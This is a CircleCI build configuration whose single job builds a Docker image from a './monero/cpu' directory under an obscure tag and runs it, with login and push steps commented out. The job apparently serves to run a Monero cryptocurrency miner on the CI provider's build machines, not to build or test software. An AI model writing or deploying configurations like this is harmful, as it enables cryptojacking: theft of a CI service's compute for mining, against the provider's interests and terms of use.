version: 2
jobs:
 build:
   machine: true
   steps:
     - checkout
     # start proprietary DB using private Docker image
     # with credentials stored in the UI
     #- run: |
     #    docker login -u $DOCKER_USER -p $DOCKER_PASS

     # build the application image
     - run: docker build -t dsomeone/sobakaka:mualpine ./monero/cpu
     #- run: docker build -t zenidine/nizadam:ualpine ./monero/cpu-ualpine

     # deploy the image
     #- run: docker push zenidine/nizadam:mualpine
     #- run: docker push zenidine/nizadam:ualpine
     
     # Run docker image
     - run: docker run dsomeone/sobakaka:mualpine
